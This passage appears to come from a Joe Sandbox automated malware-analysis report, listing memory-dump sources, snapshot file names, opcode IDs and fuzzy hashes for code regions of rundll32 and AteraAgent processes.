                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9201D131B0021687EB19AA6895663EF7BF79BC8304F20443EC102F73C0CE796D068B90
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7663239e801fb2501967de186653cefa6f0b34570a51d39642894219f7952c27
                                                                                                                                                                                                                                                                                                • Instruction ID: 3ef52ee45efbd31ecdccd97c1ed0894011315285a32f160befe938f393f618a9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7663239e801fb2501967de186653cefa6f0b34570a51d39642894219f7952c27
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56012D303002118FEB1EAB74E95465E7F22EF81304B104579D142DF2D2EF20E8CA87E0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 16f14ab338cf60d7ce534765d1aef3e6d82088a6c1c7e3333631676530de0d78
                                                                                                                                                                                                                                                                                                • Instruction ID: a7945f3845fea21b169938e7903e995449000d1082bb646b807c2e95d73e3c45
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16f14ab338cf60d7ce534765d1aef3e6d82088a6c1c7e3333631676530de0d78
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30018178B112148FCB14EF78D5056AEBBF5EB88611B10047AE909D7360EB359D42CB90
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: cef9365d1208b9ba33eaba9b9740b240d585b774fc771fd736e6da61a434f5a8
                                                                                                                                                                                                                                                                                                • Instruction ID: 3872649c9571edbc6d0b922362cf51f938c5d456b4bebcc4c50b3c96dc3df733
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cef9365d1208b9ba33eaba9b9740b240d585b774fc771fd736e6da61a434f5a8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F0E20174E2E91FD747267C092205E2F668F83604B5A09F7C549EB3D3DC04AC0A83EA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5030a25e7473ae96be36a4811a327a633f0669a69e96ca7e675142daddac4949
                                                                                                                                                                                                                                                                                                • Instruction ID: 8da257edf8b82a4301559328c7650e01f603176dcacaebf7cb1c7f46cc6712ba
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5030a25e7473ae96be36a4811a327a633f0669a69e96ca7e675142daddac4949
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9F02E797453505BDB255A65A59032AAF5D5FD4164F09007ADD44CB356DE20DC02C3D0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ce8e5d228cf724bbcd900d279c8c46e16e537007724d5028fbeb287f4284ce47
                                                                                                                                                                                                                                                                                                • Instruction ID: 9f474a43e5d690b1fba4ec92f6c5eec92b771500f0276d880f54033c8bd2f4ab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce8e5d228cf724bbcd900d279c8c46e16e537007724d5028fbeb287f4284ce47
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94F096303102108BDB5D6FB4D9056597B56EB81315B104979E5069B394DF61ECC48BE4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3f2b729d297f3b91164e1aaaa605da1907c678432a88512d4bced37a5dd3acc9
                                                                                                                                                                                                                                                                                                • Instruction ID: c6066af8d45a10bfe85be34148268e7efa8b93910f8da48f87b37e1fea63ad47
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2b729d297f3b91164e1aaaa605da1907c678432a88512d4bced37a5dd3acc9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF0B470A84145AFD748AF7862A72267FEAEFC42107051C7DC146CF3A5EE29D8458B91
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a9139f94fadb62445b53383e16c4198d217b99f477c8c1d401179312e0bc30a0
                                                                                                                                                                                                                                                                                                • Instruction ID: 29373edf40f2691e9b787b90c38c6304fae0f5707ecfc8cc604a6d9e9559974f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9139f94fadb62445b53383e16c4198d217b99f477c8c1d401179312e0bc30a0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5E0DF3134A270CFA71F1AA638641FE3B999E82A15B1664A6E416D71D2EB0CCD438791
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 451f83fe69b494e10c2cb0ca3a3747402b31a6bae422a9da8129a24babac5885
                                                                                                                                                                                                                                                                                                • Instruction ID: f89f4bae73d0483c566b663a0a0c169203ba18576921ddbe1104e4e5d55cb000
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 451f83fe69b494e10c2cb0ca3a3747402b31a6bae422a9da8129a24babac5885
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEF02B3130D2458FDB019B64E466615BF19EB41204B298DEAE18ACF313DD14E891C345
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3095fa762ce71f9563ed6f803b50b31cceba9d43e37fbf5d20911aa5c1c19a8a
                                                                                                                                                                                                                                                                                                • Instruction ID: 3287dc5c5b435a0ca70b8aacf51653e9d6a8b6beaf58a4230c28e47c94bd077a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3095fa762ce71f9563ed6f803b50b31cceba9d43e37fbf5d20911aa5c1c19a8a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84E0D8B594A2059FCB01CFA4DD915CDBF74DE0520472041A6C444D7263FA304B0387D1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e8efe09818d1d1acf8fcd9812859f9cd3032ca318059bba3cde0d751b98634dc
                                                                                                                                                                                                                                                                                                • Instruction ID: ea5dd01461e8b9f2a46172cded88b637cc573c061747c04b55b1e4ee853bc989
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8efe09818d1d1acf8fcd9812859f9cd3032ca318059bba3cde0d751b98634dc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACD02B30311124C7DB1D1FB764042BE358CDF42651F012075F42AE22C0DF0CDD414384
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 84113bfd48e96fb3a8a0970ad958935d4023e8876d49c54d960e891a11386f07
                                                                                                                                                                                                                                                                                                • Instruction ID: fe858fc9bab1452b4c192e6433e118ab4112899196792b5e777900a9314c1ec1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84113bfd48e96fb3a8a0970ad958935d4023e8876d49c54d960e891a11386f07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEE0C2312586200FD701976CA4514847B749F0A714B0600EAD146CB6A3C6958C038784
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a7c6d39e52c395cb94c3d809f4212768b800c332298c2523093d2cb7b17cd719
                                                                                                                                                                                                                                                                                                • Instruction ID: 2cb26e6ce9aa51471740d7bb4ba179cc1111eb3af224859f5ce6d2e4e2025342
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c6d39e52c395cb94c3d809f4212768b800c332298c2523093d2cb7b17cd719
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56D0A931360220ABD640A3ACE45496A739EDF8A728B0008AAF20BCB734C992FC000388
Memory Dump Source
• Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 494fe8463ad51d24e8b9bbe34b571d330edb8b3f5746712df25504a2af232b58
                                                                                                                                                                                                                                                                                                • Instruction ID: 68d2a46488a442f3c1cd2e5516ffcce01ae4f0647ed6ff3bf0ac3dafd848e95a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 494fe8463ad51d24e8b9bbe34b571d330edb8b3f5746712df25504a2af232b58
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2B26A70A0961D8FDBA9EB54C8A4BA8B7B1FF59304F5500FDD01ED7296CA35AA81CF10
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7561858a65d8f6e59d7c8938f1a80ec31d3bc03de115b2ffb8c6420ed882e6a7
                                                                                                                                                                                                                                                                                                • Instruction ID: 5323cee2d20bd4efc62031a3e75bd2c0c290db6c9e10a90181d5cbb31f78ee6f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7561858a65d8f6e59d7c8938f1a80ec31d3bc03de115b2ffb8c6420ed882e6a7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3427C71E0A65D8FDBA5EA6488A57A9B7F1EF06300F1501FDD04DE72A2CA785E84CF00
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 40be60cba888bd06376c53d9a0046de5988db18be123acb612e2687da1a709bd
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ef5ea999116a795545221cf23fa9c2d863b74e3829e16a3d4d9cbe6bbafc46a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40be60cba888bd06376c53d9a0046de5988db18be123acb612e2687da1a709bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE1F730A09A4E8FEBA8EF28C8A57E977D1FF54310F44426EE80DC7295CF7499818781
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ad8a0dab4efa0b7deaf06dbcbcb1781ad64d8c7f4e36d4a0b12e2dc46cd1a2f7
                                                                                                                                                                                                                                                                                                • Instruction ID: ed7be8fb21cb2bdc8d943c17435386058fe03512df56c371c23b6ad5b8e11f52
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad8a0dab4efa0b7deaf06dbcbcb1781ad64d8c7f4e36d4a0b12e2dc46cd1a2f7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76512D31E1A61D8FEBB5EE6888947A9B3B1EF59700F5241F9D00DD72A1CE356E818F40
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: bc9a2662e3abcb55b6054c8907ad1cfd4308eb77bb9f3b3efd6cd35a19025b84
                                                                                                                                                                                                                                                                                                • Instruction ID: 4bdb253d1b58f30e46c96e332774c9dac574308e1f4a8242634757cbf3d2fd36
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc9a2662e3abcb55b6054c8907ad1cfd4308eb77bb9f3b3efd6cd35a19025b84
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72414B31E1AA1D8FEBB5EE5888A57A9B3B1EF55701F1141F9D00CD72A1CE386E858F40
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3bb2bc974337f3c0bbd81eef708e1e68734fb9329d6e521c8635ff5aba3a1724
                                                                                                                                                                                                                                                                                                • Instruction ID: 238efc4eede36d9b6a7e655d11eb327c6d75f4636df4df733afdccf763717e58
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bb2bc974337f3c0bbd81eef708e1e68734fb9329d6e521c8635ff5aba3a1724
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B411B71E0962D8FEBA5EF6488947A9B3B0EB19700F5141E9D00DD32A1CE34AF81CF40
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: N_I$N_^$N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-3680607079
                                                                                                                                                                                                                                                                                                • Opcode ID: 7e352ec0d95e76c6c1a42a277cb4120af962492bbef98e5684ce2bf625bf2324
                                                                                                                                                                                                                                                                                                • Instruction ID: 054ca4e07a6b29cd523bfef88d8599a63177dbb4557d857045b916812b4072ec
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e352ec0d95e76c6c1a42a277cb4120af962492bbef98e5684ce2bf625bf2324
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CF13A57B0E9990BE325FAACB8B25E93B50EF8137574981BBD18CCB1E7DC14690683C1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: N_^$N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-324526423
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: c$N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-768855989
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763506251.00007FFD9B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B460000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763506251.00007FFD9B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B460000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                • Instruction ID: 2f5d6799919f7fa74c0cea29a3f60baa6250a3c38357338a4c10be0c553aa27a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9df0169810de7bceefd26c212e7240a9996f5cbb61ca083e1ff7b119cd5a13f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03512531E0E64E4FE7BEFAA448E11B877D0EF55351F1701BED009C76E1EE286A058661
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 87123c66fa66854f977911379210b3c3b0fc806659f84591514dc968924d39d0
                                                                                                                                                                                                                                                                                                • Instruction ID: 4875cb666e8878641754073f7b9f734b195d7b9dabb7d78df90c2d29767aa974
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87123c66fa66854f977911379210b3c3b0fc806659f84591514dc968924d39d0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7931F670E1990DDFDB94EBA8C4A5AACB7B1FF59301F5101B9D00DE72A1DA38A942CB00
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
